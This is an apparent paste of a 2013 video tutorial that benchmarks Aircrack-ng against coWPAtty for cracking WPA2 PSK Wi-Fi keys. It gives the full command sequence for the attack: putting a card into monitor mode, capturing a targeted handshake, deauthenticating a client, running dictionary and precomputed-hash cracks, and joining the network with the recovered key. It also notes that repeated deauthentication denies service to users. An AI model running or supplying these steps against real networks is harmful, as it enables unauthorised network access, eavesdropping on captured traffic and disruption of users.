wpa2aircow

SUBMITTED BY: Guest

DATE: Dec. 6, 2013, 9:15 a.m.

FORMAT: Text only

SIZE: 3.8 kB

Raw Download

HITS: 699

Report
  1. What is this?
  2. Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
  3. It shows 4 different cracks, the time taken and speed of the crack (see results).
  4. > Aircrack-ng (Dictionary)
  5. > Aircrack-ng & airolib-ng (Pre-computed hashes)
  6. > coWPAtty (Dictionary)
  7. > coWPAtty & Genpmk (Pre-computed hashes)
  12. How does this work?
  13. To crack WPA/WPA2 PSK you need to capture a ‘Handshake’ . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).
  15. Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.
  17. From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.
  19. If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.
  21. You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)
  23. Results
  24. Software Time (Seconds) Keys Per Second Pre Calculate Time (Seconds)
  25. AirCrack-ng 256.2 652.94 0
  26. AirCrack-ng + Airolib-ng 2 65685.4 1162.2
  27. Cowpatty 787.71 205.35 0
  28. Cowpatty + Genpmk 1.25 129715.92 1228.06
  29. AirCrack-ng & Airolib-ng 1164.2 65685.4 1162.2
  30. Cowpatty & Genpmk 1229.31 129715.92 1228.06
  32. The dictionary had 311141 lines (3.33M (3,499,543 bytes))
  33. The WPA key on line: 202762.
  34. Therefore it had to test 65.1% of the dictionary.
  38. Aircrack-ng is better with dictionary attack, whereas coWPAtty & Genpmk is better with Pre-computed hashes (also takes longer to calculate them!)
  41. What do I need?
  42. > Aircrack-ng suite
  43. > WiFi card that supports monitor mode
  44. > Big dictionary
  45. > Processing power
  48. Software
  49. Name: Aircrack-ng
  50. Version: 1.0-rc3
  51. Home Page: http://www.aircrack-ng.org/doku.php
  52. Download Link: http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz
  54. Name: coWPAtty
  55. Version: 4.3
  56. Home Page: http://www.willhackforsushi.com/Cowpatty.html
  57. Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz
  60. Commands:
  61. airmon-ng start wlan0
  62. airodump-ng mon0
  64. airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0
  66. aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
  67. aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
  71. airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
  72. airolib-ng crackwpa --import essid essid
  73. airolib-ng crackwpa --stats
  74. airolib-ng crackwpa --clean all
  75. airolib-ng crackwpa --batch
  76. airolib-ng crackwpa --verify all
  77. aircrack -r crackwpa output-01.cap
  81. cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt
  85. genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
  86. cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash
  90. wpa_passphrase g0tmi1k precivilization > wpa.conf
  91. wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
  92. dhclient -r
  93. dhclient wlan0
  94. ping 192.168.1.1
  96. Notes:
  97. Song: First Sate - Off the Radar (First State's 808 Clash Mix)
  98. Video length: 08:38
  99. Capture length: 01:14:29
  102. Blog Post: http://g0tmi1k.blogspot.com/2010/02/video-cracking-wifi-wpawpa2-aircrack-ng.html
comments powered by Disqus